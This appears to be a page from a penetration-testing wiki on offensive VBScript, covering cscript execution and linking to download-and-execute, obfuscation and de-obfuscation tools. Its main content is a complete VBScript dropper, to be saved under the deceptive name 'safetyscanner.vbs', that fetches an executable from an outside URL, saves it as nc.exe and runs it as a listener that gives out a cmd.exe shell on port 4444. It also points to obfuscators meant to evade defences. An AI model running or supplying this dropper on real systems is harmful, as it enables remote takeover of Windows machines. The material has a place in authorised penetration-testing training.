⭕VBS

when a VBScript is executed from the command line (cmd.exe), by default it uses wscript (GUI). cscript.exe can be launched explicitly, like this:

cscript console.vbs

shellcode execution with VBScript

pentest-wiki/Execute_metasploit_vbs_payload_in_cmd_shell.md at master · nixawk/pentest-wikiGitHub

VBScript Download & Execute

Downloads, decode, decrypt and executes a VBScript using cmd and mshta.

GitHub - AdiMarianMutu/MSHTA-VBS-download-and-execute: Downloads, decode, decrypt and executes a VBScript using cmd and mshtaGitHub

without obfuscation:

Put the following lines into a text file. Name it safetyscanner.vbs and put on desktop.

dim http_obj
dim stream_obj
dim shell_obj
 
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
 
URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe" 'Command to run after downloading
 
http_obj.open "GET", URL, False
http_obj.send
 
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
 
shell_obj.run RUNCMD

Obfuscation

GitHub - DoctorLai/VBScript_Obfuscator: The VBScript Obfuscator written in VBScriptGitHub

Simple VBS Obfuscator

GitHub - kkar/VBS-Obfuscator-in-Python: VBScript obfuscation to allow PenTesters bypass countermeasures.GitHub

De-obfuscation

GitHub - sbruyere/vbeDecoder: Decoder for encoded Visual Basic Script Encoded scripts (VBE), written in C#, and provided as a library for .Net Standard.GitHub

PreviousHTA NextVBA

Last updated 1 year ago